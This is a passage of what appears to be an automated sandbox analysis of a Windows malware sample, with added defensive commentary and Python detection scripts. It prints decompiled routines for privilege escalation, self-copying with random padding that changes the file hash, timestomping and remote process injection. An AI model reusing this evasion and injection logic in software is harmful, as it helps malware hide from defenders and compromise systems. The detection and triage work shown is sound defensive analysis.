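The API listing above is the order a detection engineer looks for: VirtualAllocEx with MEM_RESERVE (0x2000) and then MEM_COMMIT (0x1000) and PAGE_READWRITE (4), WriteProcessMemory into the remote allocation, and finally VirtualProtectEx that flips the written region to PAGE_EXECUTE_READWRITE (0x40). The earlier VirtualProtectEx with 0x2 (PAGE_READONLY) is a header or data section and is not the tell on its own. The Python below is an added example, not part of this report, that parses the report's own bulleted `Api.Module(args), ref: addr` lines and flags that sequence; the sample lines are copied from the listing above, and the argument positions follow the documented Win32 prototypes.

```python
import re

# Lines copied from the API listing of the injection routine in this report.
SAMPLE_API_LINES = [
    "• VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,025DF908), ref: 004070FB",
    "• VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,025DF908), ref: 00407112",
    "• VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,025DF908), ref: 004071C3",
    "• WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,025DF908), ref: 004071DB",
    "• VirtualProtectEx.KERNELBASE(?,?,?,00000002,025DF908,?,025DF908), ref: 004071EE",
    "• VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,025DF908), ref: 0040721E",
    "• WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,025DF908), ref: 0040723D",
    "• VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,025DF908,?,025DF908), ref: 00407254",
]

MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
PAGE_EXECUTE_ANY = {0x10, 0x20, 0x40, 0x80}   # PAGE_EXECUTE .. PAGE_EXECUTE_WRITECOPY

_LINE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})")


def parse_api_line(line: str):
    """Turn one report line into {"api", "module", "args", "ref"}; None if it has no
    argument list (e.g. a bare 'GetLastError.KERNEL32 ref: ...' line)."""
    m = _LINE.search(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = []
    for a in raw_args.split(","):
        a = a.strip()
        if a == "?":
            args.append(None)            # value not recovered by the sandbox
        else:
            try:
                args.append(int(a, 16))
            except ValueError:
                args.append(a)           # string literal such as SeDebugPrivilege
    return {"api": api, "module": module, "args": args, "ref": ref}


def find_injection_sequence(lines):
    """Stage machine: remote allocation -> remote write -> protect to executable.
    VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect)
    VirtualProtectEx(hProcess, lpAddress, dwSize, flNewProtect, lpflOldProtect)"""
    result = {"allocs": [], "writes": [], "exec_protect_ref": None, "verdict": False}
    stage = 0
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        api, args = call["api"], call["args"]
        if api == "VirtualAllocEx" and len(args) >= 5:
            alloc_type, protect = args[3], args[4]
            result["allocs"].append((call["ref"], alloc_type, protect))
            if alloc_type is not None and alloc_type & (MEM_COMMIT | MEM_RESERVE):
                stage = max(stage, 1)
        elif api == "WriteProcessMemory" and stage >= 1:
            result["writes"].append(call["ref"])
            stage = 2
        elif api == "VirtualProtectEx" and stage == 2 and len(args) >= 4:
            new_protect = args[3]
            if new_protect is not None and new_protect in PAGE_EXECUTE_ANY:
                result["exec_protect_ref"] = call["ref"]
                result["verdict"] = True
                break
    return result
```

On the eight lines from the report the verdict fires at the VirtualProtectEx with 0x40 (ref 00407254), after four remote allocations and two writes; the same stage machine maps directly onto Sysmon or ETW API telemetry, where the handle argument rather than `?` tells you which target process received the image.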

    C-Code - Quality: 100%
    			E004061FF() {
    				short _v524;
    				intOrPtr _v552;
    				void* _v560;
    				void* _t10;
    				struct tagPROCESSENTRY32W* _t11;
    				int _t19;
    				signed short _t20;
    				intOrPtr _t21;
    				void* _t22;
    				signed short _t24;
    
    				_t20 = 0;
    				_v560 = 0x22c;
    				_t10 = CreateToolhelp32Snapshot(2, 0); // executed
    				_t22 = _t10;
    				_t11 =  &_v560;
    				Process32FirstW(_t22, _t11); // executed
    				if(_t11 != 0) {
    					do {
    						_t24 = 0;
    						if(_v552 != 0) {
    							while(1) {
    								_t21 =  *0x416c34; // 0x25df5a8
    								_t19 = lstrcmpiW( &_v524,  *(_t21 + ( *(0x401db0 + (_t24 & 0x0000ffff) * 2) & 0x0000ffff) * 4)); // executed
    								if(_t19 == 0) {
    									break;
    								}
    								_t24 = _t24 + 1;
    								if(_t24 < 2) {
    									continue;
    								} else {
    								}
    								goto L7;
    							}
    							_t20 = 1;
    						}
    						L7:
    					} while (Process32NextW(_t22,  &_v560) != 0);
    				}
    				FindCloseChangeNotification(_t22); // executed
    				return _t20;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040621A
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040622A
    • lstrcmpiW.KERNELBASE(?,025DF5A8,?,?,00000000), ref: 0040625A
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00406277
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00406283
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
    • String ID:
    • API String ID: 545148253-0
    • Opcode ID: 02bb08832eb079d9b523de23ce8285367941dce07cffdee473244b62a1abd1cd
    • Instruction ID: 79abaa84898b50ec91301edb431aef3e50040447fdb93f8cf5ad041a4bee79a6
    • Opcode Fuzzy Hash: 02bb08832eb079d9b523de23ce8285367941dce07cffdee473244b62a1abd1cd
    • Instruction Fuzzy Hash: FA01B531502124ABDB106BB5FC4CBFB77B8AB45B10F1240BAF402E2190D734C852CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041158D(WCHAR* _a4) {
    				void* _v8;
    				intOrPtr _v12;
    				struct _TOKEN_PRIVILEGES _v24;
    				void* _t9;
    				int _t13;
    				int _t16;
    				long _t19;
    
    				_t9 =  *0x416bbc; // 0xffffffff
    				_t19 = 0;
    				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
    					_v24.PrivilegeCount = 1;
    					_v12 = 2;
    					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
    					if(_t13 != 0) {
    						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
    						if(_t16 != 0 && GetLastError() == 0) {
    							_t19 = 1;
    						}
    					}
    					FindCloseChangeNotification(_v8); // executed
    				}
    				return _t19;
    			}

    APIs
    • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,00000000,0040B71D,SeDebugPrivilege), ref: 004115A2
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 004115C2
    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 004115D8
    • GetLastError.KERNEL32 ref: 004115E2
    • FindCloseChangeNotification.KERNELBASE(?), ref: 004115F1
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 1669889876-0
    • Opcode ID: 54b1d8f445943a0a2cbad23dc262d6f6b9c00bde424f1f9ef516e20dc0e685d3
    • Instruction ID: d0af15cdecea10148db2b0478a55a7981dadf13aa8ff0d0c7d111229f253eee7
    • Opcode Fuzzy Hash: 54b1d8f445943a0a2cbad23dc262d6f6b9c00bde424f1f9ef516e20dc0e685d3
    • Instruction Fuzzy Hash: 34014BB1611209BFEB009FA4CD89AEFBBBDEB00344F058029B502E1160EB70DA44DA68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B4E1(CHAR* __ecx, void* __edx, intOrPtr _a4) {
    				struct HINSTANCE__* _t6;
    				_Unknown_base(*)()* _t10;
    				void* _t12;
    				signed short _t16;
    				CHAR** _t17;
    				struct HINSTANCE__* _t18;
    
    				_t12 = __edx; // executed
    				_t6 = LoadLibraryA(__ecx); // executed
    				_t18 = _t6;
    				if(_t18 == 0) {
    					L4:
    					return _t18;
    				}
    				_t16 = 0;
    				if(0 >= _a4) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t17 = _t12 + (_t16 & 0x0000ffff) * 8;
    					_t10 = GetProcAddress(_t18,  *_t17);
    					if(_t10 == 0) {
    						break;
    					}
    					_t16 = _t16 + 1;
    					 *(_t17[1]) = _t10;
    					if(_t16 < _a4) {
    						continue;
    					}
    					goto L4;
    				}
    				return 0;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(kernel32.dll), ref: 0040B4E8
    • GetProcAddress.KERNELBASE(00000000), ref: 0040B508
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: kernel32.dll
    • API String ID: 2574300362-1793498882
    • Opcode ID: 36bee88d8e5a881228681e7c20b36737f6c0120f57a5269b868846a105bd9ee1
    • Instruction ID: 7ee50df321d16af985c14168c1683ccf43e7a9f3ef2bb0feae8d5c6ef8981bd1
    • Opcode Fuzzy Hash: 36bee88d8e5a881228681e7c20b36737f6c0120f57a5269b868846a105bd9ee1
    • Instruction Fuzzy Hash: 56F0A7313012156BC3106FA5AD448B3B799EFC6745702487BB942E3140EB35D801D6AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			_entry_(void* __ebx, void* __edi, void* __esi) {
    				signed int _v5;
    				int _v12;
    				signed int _v13;
    				long _v20;
    				void* _v24;
    				char _v28;
    				struct _FILETIME _v36;
    				struct _FILETIME _v44;
    				struct _FILETIME _v52;
    				short _v572;
    				short _v1092;
    				void* _t76;
    				intOrPtr _t78;
    				void* _t79;
    				signed int _t80;
    				signed int _t83;
    				intOrPtr _t84;
    				intOrPtr _t90;
    				signed int _t95;
    				signed int _t98;
    				void* _t101;
    				signed int _t105;
    				intOrPtr _t106;
    				signed int _t107;
    				intOrPtr _t108;
    				void* _t119;
    				signed int _t122;
    				intOrPtr _t125;
    				void* _t129;
    				long _t142;
    				intOrPtr _t150;
    				void* _t151;
    				intOrPtr _t154;
    				intOrPtr _t156;
    				intOrPtr _t158;
    				signed int _t159;
    				void* _t164;
    				signed int _t165;
    				signed int _t172;
    				void* _t174;
    				void* _t175;
    				intOrPtr _t176;
    				void* _t177;
    				void* _t178;
    				void* _t180;
    				void* _t181;
    
    				_t177 = __esi;
    				E00407094(); // executed
    				_t76 = E0040B585(); // executed
    				if(_t76 == 0) {
    					return 0;
    				}
    				_v12 = 0;
    				_t172 = GetCommandLineA();
    				__eflags = _t172;
    				if(_t172 == 0) {
    					L11:
    					_t78 =  *0x416c34; // 0x25df5a8
    					_t10 = _t78 + 0x30; // 0x25df930
    					_t79 = CreateMutexW(0x417680, 1,  *_t10); // executed
    					_v24 = _t79;
    					_t80 = GetLastError();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						L48:
    						__eflags = _v24;
    						if(_v24 != 0) {
    							CloseHandle(_v24);
    						}
    						E00411FA8(_t170, _t172);
    						ExitProcess(0);
    					}
    					_t83 = E004061FF(); // executed
    					_v5 = _t83;
    					_t84 =  *0x416c34; // 0x25df5a8
    					_v20 = 0;
    					_t14 = _t84 + 0x2c; // 0x25df908
    					_v13 = 0;
    					__eflags = E0040B355( *_t14);
    					if(__eflags == 0) {
    						L23:
    						_push(_t177);
    						GetModuleFileNameW(0,  &_v1092, 0x104);
    						E0040B770( &_v572);
    						_t90 =  *0x416c34; // 0x25df5a8
    						_t35 = _t90 + 0xc; // 0x25df7b0
    						PathCombineW( &_v572,  &_v572,  *_t35);
    						_t95 = lstrcmpiW( &_v1092,  &_v572);
    						__eflags = _t95;
    						_push( &_v572);
    						if(_t95 == 0) {
    							_v5 = 0;
    							E0040BC89();
    							L38:
    							__eflags = _v5;
    							if(_v5 == 0) {
    								_t98 =  *0x416cd0; // 0x0
    								_t170 =  *0x416c34; // 0x25df5a8
    								_t101 = E0040BA69( *((intOrPtr*)(_t170 + (_t98 & 0x00000001 | 0x00000002) * 8))); // executed
    								_t174 = _t101;
    								_t178 = E00406A53;
    								while(1) {
    									_t105 = E00407873(0, _t170, _t178 -  *0x416d84, _t174); // executed
    									__eflags = _t105;
    									if(_t105 != 0) {
    										break;
    									}
    									Sleep(0x14); // executed
    								}
    								while(1) {
    									_t106 =  *0x416c34; // 0x25df5a8
    									_t72 = _t106 + 0x28; // 0x25df8e0
    									_t107 = E0040B355( *_t72);
    									__eflags = _t107;
    									if(_t107 != 0) {
    										break;
    									}
    									Sleep(0x14);
    								}
    								L47:
    								goto L48;
    							}
    							__eflags = _v13;
    							if(__eflags != 0) {
    								_t108 =  *0x416c34; // 0x25df5a8
    								_t69 = _t108 + 0x2c; // 0x25df908
    								E0040B37A(__eflags,  *_t69, 0xa, 0, 0, 0, 0);
    							}
    							goto L47;
    						}
    						E0040BC89(); // executed
    						E0040FFBF( &_v572);
    						CopyFileW( &_v1092,  &_v572, 0); // executed
    						SetFileAttributesW( &_v572, 0x26); // executed
    						_t119 = CreateFileW( &_v572, 0x40000000, 1, 0, 3, 0, 0); // executed
    						_v12 = _t119;
    						__eflags = _t119 - 0xffffffff;
    						if(_t119 == 0xffffffff) {
    							L36:
    							SetFileAttributesW( &_v572, 0x21); // executed
    							goto L38;
    						}
    						_t122 = SetFilePointer(_t119, 0, 0, 2); // executed
    						__eflags = _t122;
    						if(_t122 == 0) {
    							L33:
    							 *0x416c44(0,  &_v1092, 0x25, 1);
    							_t125 =  *0x416c34; // 0x25df5a8
    							_t54 = _t125 + 0x5c; // 0x25dfb80
    							PathCombineW( &_v1092,  &_v1092,  *_t54);
    							_t129 = CreateFileW( &_v1092, 0x80000000, 3, 0, 3, 0, 0); // executed
    							_t180 = _t129;
    							__eflags = _t180 - 0xffffffff;
    							if(_t180 != 0xffffffff) {
    								GetFileTime(_t180,  &_v36,  &_v52,  &_v44);
    								SetFileTime(_v12,  &_v36,  &_v52,  &_v44); // executed
    								FindCloseChangeNotification(_t180); // executed
    							}
    							CloseHandle(_v12);
    							goto L36;
    						}
    						_t142 = E004101D4(0x400, 0x40) << 9;
    						_v20 = _t142;
    						__eflags = _t142;
    						if(_t142 == 0) {
    							_t175 = 0;
    							__eflags = 0;
    						} else {
    							_t175 = E0040F0A8(_t142);
    							_t142 = _v20;
    						}
    						__eflags = _t175;
    						if(_t175 == 0) {
    							goto L33;
    						} else {
    							_t181 = 0;
    							__eflags = _t142;
    							if(_t142 <= 0) {
    								L32:
    								_t170 =  &_v20;
    								WriteFile(_v12, _t175, _t142,  &_v20, 0); // executed
    								FlushFileBuffers(_v12);
    								E0040F0C0(_t175);
    								goto L33;
    							} else {
    								goto L31;
    							}
    							do {
    								L31:
    								 *((char*)(_t181 + _t175)) = E004101D4(E004101D4(0xff, 1), 0);
    								_t142 = _v20;
    								_t181 = _t181 + 1;
    								__eflags = _t181 - _t142;
    							} while (_t181 < _t142);
    							goto L32;
    						}
    					}
    					_t150 =  *0x416c34; // 0x25df5a8
    					_t16 = _t150 + 0x2c; // 0x25df908
    					_t151 = E0040B37A(__eflags,  *_t16, 1, 0, 0, 0, 0);
    					__eflags = _v12 & 0x00000001;
    					if(__eflags != 0) {
    						L16:
    						_t154 =  *0x416c34; // 0x25df5a8
    						_t23 = _t154 + 0x2c; // 0x25df908
    						_v12 = 0;
    						E0040B37A(__eflags,  *_t23, 0xb,  &_v12,  &_v20, 0, 0);
    						_t156 =  *0x416c34; // 0x25df5a8
    						_push(0);
    						_push(0);
    						_push(0);
    						_push(0);
    						__eflags = _v5;
    						if(__eflags == 0) {
    							_push(3);
    							_t27 = _t156 + 0x2c; // 0x25df908
    							_push( *_t27);
    							E0040B37A(__eflags);
    							while(1) {
    								_t158 =  *0x416c34; // 0x25df5a8
    								_t28 = _t158 + 0x2c; // 0x25df908
    								_t159 = E0040B355( *_t28);
    								__eflags = _t159;
    								if(_t159 == 0) {
    									break;
    								}
    								Sleep(0x14);
    							}
    							L21:
    							_v13 = 1;
    							__eflags = _v12;
    							if(_v12 != 0) {
    								E0040FFBF(_v12);
    								E0040F0C0(_v12);
    							}
    							goto L23;
    						}
    						_push(9);
    						_t26 = _t156 + 0x2c; // 0x25df908
    						_push( *_t26);
    						E0040B37A(__eflags);
    						goto L21;
    					}
    					__eflags = _t151 - 0x1020702;
    					if(__eflags < 0) {
    						goto L16;
    					}
    					CloseHandle(_v24);
    					ExitProcess(0);
    				} else {
    					_t164 = E0040F521(_t172);
    					_t170 =  &_v28;
    					_t165 = E0040F37A(_t164,  &_v28, _t172);
    					__eflags = _t165;
    					if(_t165 <= 0) {
    						goto L11;
    					}
    					_t176 = _v28;
    					_t172 = 0;
    					__eflags = _t165;
    					if(_t165 <= 0) {
    						L10:
    						E0040F0DC(_t165, _t176);
    						goto L11;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t170 =  *((intOrPtr*)(_t176 + _t172 * 4));
    						__eflags =  *_t170 - 0x2d;
    						if( *_t170 == 0x2d) {
    							__eflags =  *((char*)(_t170 + 1)) - 0x66;
    							if( *((char*)(_t170 + 1)) == 0x66) {
    								__eflags =  *(_t170 + 2);
    								if( *(_t170 + 2) == 0) {
    									_t8 =  &_v12;
    									 *_t8 = _v12 | 0x00000001;
    									__eflags =  *_t8;
    								}
    							}
    						}
    						_t172 = _t172 + 1;
    						__eflags = _t172 - _t165;
    					} while (_t172 < _t165);
    					goto L10;
    				}
    			}

    APIs
    • GetCommandLineA.KERNEL32 ref: 004062B1
    • CreateMutexW.KERNELBASE(00417680,00000001,025DF930), ref: 00406309
    • GetLastError.KERNEL32 ref: 00406312
    • CloseHandle.KERNEL32(?,025DF908,00000001,00000000,00000000,00000000,00000000,025DF908), ref: 00406366
    • ExitProcess.KERNEL32 ref: 0040636D
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
    • String ID:
    • API String ID: 1529117804-0
    • Opcode ID: a67ab1fe0345af91154994c26cd64157a5ba996445a2d3d34d645322d4cc096c
    • Instruction ID: 028aaff221cb09249815deb90b67394897e8da99c31c627cd268efbd589bb97a
    • Opcode Fuzzy Hash: a67ab1fe0345af91154994c26cd64157a5ba996445a2d3d34d645322d4cc096c
    • Instruction Fuzzy Hash: 9AB18571500208AFDB10ABA4DD85EEE7B7DEB04304F06817AF602B61A1DB798D558B5D
    Uniqueness

    Uniqueness Score: -1.00%
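The install path in `_entry_` explains why the dropped copy never hashes like the submitted sample: after CopyFileW the code seeks to the end of the copy (SetFilePointer with FILE_END), computes `E004101D4(0x400, 0x40) << 9` bytes (E004101D4 reads as the sample's random-number helper, so a random multiple of 512 bytes), fills the buffer byte by byte with further random values, and appends it with WriteFile. It then calls SHGetSpecialFolderPathW (the `*0x416c44` import, identified as such in the API list of E0040BA69 below) with CSIDL 0x25 (the system directory), opens a configured file there and copies its FILETIMEs onto the dropped copy. The Python below is an added example, not code from the sample or this report, showing the triage check that survives this: hash only the part of the file the PE section table accounts for, and report the overlay's length, 512-byte alignment and entropy. The minimal PE and the pseudo-random trailer are constructed stand-ins; the sample's own padding length and values are random, and the helper names are mine.

```python
import hashlib
import math
import random
import struct
from collections import Counter


def pe_body_length(data: bytes) -> int:
    """File offset just past the last section's raw data, i.e. the bytes the PE headers
    account for. Everything beyond it is overlay."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_hdr = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", data, file_hdr + 2)
    (opt_size,) = struct.unpack_from("<H", data, file_hdr + 16)
    sec_table = file_hdr + 20 + opt_size
    end = sec_table + 40 * num_sections                  # at least the headers
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sec_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def split_overlay(data: bytes):
    n = pe_body_length(data)
    return data[:n], data[n:]


def file_sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def body_sha256(data: bytes) -> str:
    """Hash of the PE body only; identical for copies that differ only in their overlay."""
    return file_sha256(split_overlay(data)[0])


def shannon_entropy(blob: bytes) -> float:
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values())


def build_minimal_pe(section_data: bytes = b"\xC3" * 0x200) -> bytes:
    """Constructed stand-in for the sample: a one-section PE32 whose section starts at
    file offset 0x200 (not a real executable)."""
    e_lfanew, raw_ptr = 0x40, 0x200
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 0x1C, 0x400000)          # ImageBase
    struct.pack_into("<I", opt, 0x3C, 0x200)             # FileAlignment
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                      len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + file_hdr + bytes(opt) + sec).ljust(raw_ptr, b"\x00")
    return headers + section_data


def random_trailer(units: int, seed: int = 7) -> bytes:
    """Constructed stand-in for the sample's padding: units * 512 pseudo-random bytes."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(units * 512))


def triage(dropped: bytes) -> dict:
    """What an analyst wants from the dropped copy: a hash that matches the submitted
    sample, and the overlay facts that give the padding away."""
    _, overlay = split_overlay(dropped)
    return {
        "body_sha256": body_sha256(dropped),
        "overlay_len": len(overlay),
        "overlay_512_aligned": len(overlay) % 512 == 0,
        "overlay_entropy": round(shannon_entropy(overlay), 2),
    }
```

The body hash ties the dropped file back to the submitted sample even though the full-file SHA256 differs on every install, and a 512-byte-aligned, near-8-bit-entropy overlay on a copy whose timestamps match a system file is the combination to alert on. A dropped copy of a real sample also needs its SizeOfRawData values to be trusted, so treat a body length that exceeds the file as a damaged header rather than an overlay.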

    C-Code - Quality: 76%
    			E0040BA69(WCHAR* _a4) {
    				long _v8;
    				char _v520;
    				short _v522;
    				short _v524;
    				short _v526;
    				char _v528;
    				short _v1048;
    				long _v1076;
    				void* _v1084;
    				short _v1604;
    				short _v2124;
    				short _v2644;
    				short _v3164;
    				void* _t37;
    				intOrPtr _t38;
    				signed int _t41;
    				struct tagPROCESSENTRY32W* _t47;
    				void* _t53;
    				WCHAR* _t59;
    				void* _t62;
    				long _t68;
    				int _t74;
    				void* _t76;
    				void* _t78;
    				void* _t80;
    
    				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
    				_t76 = _t37;
    				if(_t76 != 0xffffffff) {
    					_v8 = 0x103;
    					if(( *0x416cd0 & 0x00000001) == 0) {
    						_t38 =  *0x416c34; // 0x25df5a8
    						_t7 = _t38 + 0x1c; // 0x25df7d8
    						lstrcpyW( &_v1604,  *_t7);
    					} else {
    						_t74 = GetUserNameW( &_v1604,  &_v8);
    						if(_t74 == 0) {
    							_v1604 = _t74;
    						}
    					}
    					_t41 =  *0x416cd0; // 0x0
    					_v8 = 0;
    					 *0x416c44(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
    					_t47 =  &_v1084;
    					_v1084 = 0x22c;
    					Process32FirstW(_t76, _t47); // executed
    					while(_t47 != 0) {
    						if(lstrcmpiW( &_v1048, _a4) != 0) {
    							L22:
    							_t47 = Process32NextW(_t76,  &_v1084);
    							continue;
    						}
    						_t80 = OpenProcess(0x410, 0, _v1076);
    						if(_t80 == 0) {
    							goto L22;
    						}
    						_t53 =  *0x416d80(_t80, 0,  &_v528, 0x104); // executed
    						if(_t53 == 0) {
    							L21:
    							CloseHandle(_t80);
    							goto L22;
    						}
    						PathCombineW( &_v2124,  &_v3164, _a4);
    						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
    							_push( &_v2124);
    							_t59 =  &_v528;
    						} else {
    							_push( &_v2124);
    							_t59 =  &_v520;
    						}
    						if(lstrcmpiW(_t59, ??) != 0) {
    							goto L21;
    						} else {
    							if(_v8 == 0) {
    								_v8 = _v1076;
    							}
    							_t62 = E0040C0AE(_t80,  &_v2644); // executed
    							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
    								goto L21;
    							} else {
    								CloseHandle(_t80);
    								CloseHandle(_t76);
    								_t68 = _v1076;
    								L25:
    								return _t68;
    							}
    						}
    					}
    					CloseHandle(_t76);
    					_t68 = _v8;
    					goto L25;
    				}
    				return 0;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040BA79
    • GetUserNameW.ADVAPI32(?,00000103), ref: 0040BAA8
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 0040BAEC
    • Process32FirstW.KERNEL32(00000000,?), ref: 0040BB04
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC1A
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC2B
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040BC32
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
    • String ID: ?$?$\$\
    • API String ID: 4249123633-2781376886
    • Opcode ID: 8406c4a8a3268cf8435ef29c5b72c8ec3dbfec2cf1da62b9567bde33fc2f5594
    • Instruction ID: 75fa0fa9a2bd7d5adac2d3f5ac7ce9fb80f390764a06cb9fbc006abfa5dc3521
    • Opcode Fuzzy Hash: 8406c4a8a3268cf8435ef29c5b72c8ec3dbfec2cf1da62b9567bde33fc2f5594
    • Instruction Fuzzy Hash: D4512075900219ABDB219B60DC48EEB77BCFB44305F0181B6E615E2190DB78DA85DF9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00406373() {
    				DWORD* _t47;
    				int _t52;
    				signed int _t55;
    				void* _t58;
    				void* _t62;
    				DWORD* _t63;
    				void* _t64;
    				DWORD* _t67;
    				void* _t78;
    				long _t81;
    				DWORD* _t84;
    				void* _t88;
    				long _t101;
    				struct _OVERLAPPED* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    				void* _t114;
    				void* _t116;
    				void* _t117;
    				void* _t118;
    
    				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
    				E0040B770(_t118 - 0x238);
    				_t47 =  *0x416c34; // 0x25df5a8
    				_t3 =  &(_t47[3]); // 0x25df7b0
    				PathCombineW(_t118 - 0x238, _t118 - 0x238,  *_t3);
    				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
    				_push(_t118 - 0x238);
    				if(_t52 == 0) {
    					 *(_t118 - 1) = _t109;
    					E0040BC89();
    					goto L16;
    				} else {
    					E0040BC89(); // executed
    					E0040FFBF(_t118 - 0x238);
    					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
    					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
    					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
    					 *(_t118 - 8) = _t78;
    					if(_t78 == 0xffffffff) {
    						L14:
    						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
    						L16:
    						if( *(_t118 - 1) == _t109) {
    							_t55 =  *0x416cd0; // 0x0
    							_t110 =  *0x416c34; // 0x25df5a8
    							_t58 = E0040BA69( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
    							_t112 = _t58;
    							_t114 = E00406A53;
    							while(1) {
    								_t62 = E00407873(0, _t110, _t114 -  *0x416d84, _t112); // executed
    								__eflags = _t62;
    								if(_t62 != 0) {
    									break;
    								}
    								Sleep(0x14); // executed
    							}
    							while(1) {
    								_t63 =  *0x416c34; // 0x25df5a8
    								_t40 =  &(_t63[0xa]); // 0x25df8e0
    								_t64 = E0040B355( *_t40);
    								__eflags = _t64;
    								if(_t64 != 0) {
    									break;
    								}
    								Sleep(0x14);
    							}
    							L25:
    							if( *(_t118 - 0x14) != _t109) {
    								CloseHandle( *(_t118 - 0x14));
    							}
    							E00411FA8(_t110, _t111);
    							ExitProcess(_t109);
    						}
    						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
    						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
    							_t67 =  *0x416c34; // 0x25df5a8
    							_t37 =  &(_t67[0xb]); // 0x25df908
    							E0040B37A(_t128,  *_t37, 0xa, _t109, _t109, _t109, _t109);
    						}
    						goto L25;
    					}
    					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
    					if(_t81 == 0) {
    						L11:
    						 *0x416c44(_t109, _t118 - 0x440, 0x25, 1);
    						_t84 =  *0x416c34; // 0x25df5a8
    						_t22 =  &(_t84[0x17]); // 0x25dfb80
    						PathCombineW(_t118 - 0x440, _t118 - 0x440,  *_t22);
